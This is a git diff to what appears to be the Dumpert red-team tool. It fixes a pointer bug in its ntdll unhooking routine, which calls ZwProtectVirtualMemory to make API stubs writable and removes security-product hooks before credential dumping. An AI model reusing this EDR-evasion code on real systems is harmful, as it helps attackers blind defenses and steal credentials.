diff --git a/Dumpert-Aggressor/Outflank-Dumpert.bin b/Dumpert-Aggressor/Outflank-Dumpert.bin index 6101aa6..ffc1be3 100644 Binary files a/Dumpert-Aggressor/Outflank-Dumpert.bin and b/Dumpert-Aggressor/Outflank-Dumpert.bin differ diff --git a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c index 28ee4e6..8412e28 100755 --- a/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c +++ b/Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c @@ -40,9 +40,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall); + LPVOID lpBaseAddress = lpProcAddress; ULONG OldProtection, NewProtection; SIZE_T uSize = 10; - NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); + NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); if (status != STATUS_SUCCESS) { return FALSE; } @@ -52,7 +53,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { return FALSE; } - status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); + status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection); if (status != STATUS_SUCCESS) { return FALSE; } diff --git a/Dumpert/Outflank-Dumpert/Dumpert.c b/Dumpert/Outflank-Dumpert/Dumpert.c index 4539513..599dd78 100755 --- a/Dumpert/Outflank-Dumpert/Dumpert.c +++ b/Dumpert/Outflank-Dumpert/Dumpert.c @@ -44,9 +44,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]); printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall); + LPVOID lpBaseAddress = lpProcAddress; ULONG OldProtection, NewProtection; SIZE_T uSize = 10; - NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); + NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); if (status != STATUS_SUCCESS) { wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); return FALSE; @@ -58,7 +59,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) { return FALSE; } - status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); + status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection); if (status != STATUS_SUCCESS) { wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); return FALSE;